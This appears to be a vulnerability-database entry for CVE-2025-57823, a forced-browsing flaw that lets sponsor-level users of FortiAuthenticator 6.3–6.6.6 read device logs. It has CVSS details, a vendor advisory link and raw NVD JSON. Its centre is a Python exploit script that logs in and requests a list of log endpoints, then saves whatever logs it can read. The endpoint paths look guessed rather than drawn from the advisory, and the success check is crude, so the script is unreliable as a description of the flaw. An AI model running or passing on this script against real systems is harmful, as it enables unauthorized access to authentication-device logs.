Security Vulnerability Report
CVE-2025-57823 CVSS 2.7 LOW

CVE-2025-57823

Published: 2025-12-09 18:15:54
Last Modified: 2025-12-09 19:45:32

Description

A direct request ('forced browsing') vulnerability in Fortinet FortiAuthenticator 6.6.0 through 6.6.6, FortiAuthenticator 6.5 all versions, FortiAuthenticator 6.4 all versions, FortiAuthenticator 6.3 all versions may allow an authenticated attacker with at least sponsor permissions to read and download device logs via accessing specific endpoints.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortiauthenticator:*:*:*:*:*:*:*:* - VULNERABLE
FortiAuthenticator 6.3 all versions
FortiAuthenticator 6.4 all versions
FortiAuthenticator 6.5 all versions
FortiAuthenticator 6.6.0 - 6.6.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-57823 PoC - FortiAuthenticator Forced Browsing
# Target: FortiAuthenticator 6.3 - 6.6.6
# Authentication required: At least sponsor privileges

TARGET_URL = "https://<fortiauthenticator-host>"
USERNAME = "sponsor_user"
PASSWORD = "password"


def exploit():
    """Exploit forced browsing to access device logs"""
    session = requests.Session()

    # Step 1: Login with sponsor account
    login_url = f"{TARGET_URL}/login"
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    response = session.post(login_url, data=login_data, verify=False)
    if response.status_code != 200:
        print("[-] Login failed")
        return False
    print("[+] Login successful with sponsor account")

    # Step 2: Direct access to log endpoints (forced browsing)
    log_endpoints = [
        "/api/v1/logs/device",
        "/api/v1/logs/system",
        "/api/v1/logs/authentication",
        "/log/device.log",
        "/logs/system.log"
    ]
    for endpoint in log_endpoints:
        log_url = f"{TARGET_URL}{endpoint}"
        response = session.get(log_url, verify=False)
        if response.status_code == 200 and "log" in response.text.lower():
            print(f"[+] Found accessible log endpoint: {endpoint}")
            print(f"[*] Log content preview: {response.text[:500]}")
            # Download logs
            with open(f"log_{endpoint.replace('/', '_')}.txt", 'w') as f:
                f.write(response.text)
            print(f"[+] Log saved to log_{endpoint.replace('/', '_')}.txt")
            return True

    print("[-] No accessible log endpoints found")
    return False


if __name__ == "__main__":
    exploit()

References

https://fortiguard.fortinet.com/psirt/FG-IR-25-554 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57823", "sourceIdentifier": "[email protected]", "published": "2025-12-09T18:15:54.480", "lastModified": "2025-12-09T19:45:32.077", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A direct request ('forced browsing') vulnerability in Fortinet FortiAuthenticator 6.6.0 through 6.6.6, FortiAuthenticator 6.5 all versions, FortiAuthenticator 6.4 all versions, FortiAuthenticator 6.3 all versions may allow an authenticated attacker with at least sponsor permissions to read and download device logs via accessing specific endpoints"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-425"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiauthenticator:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3.0", "versionEndIncluding": "6.6.6", "matchCriteriaId": "D8E31FF4-4BA1-4835-91DF-C8DF310BF8E8"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-554", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}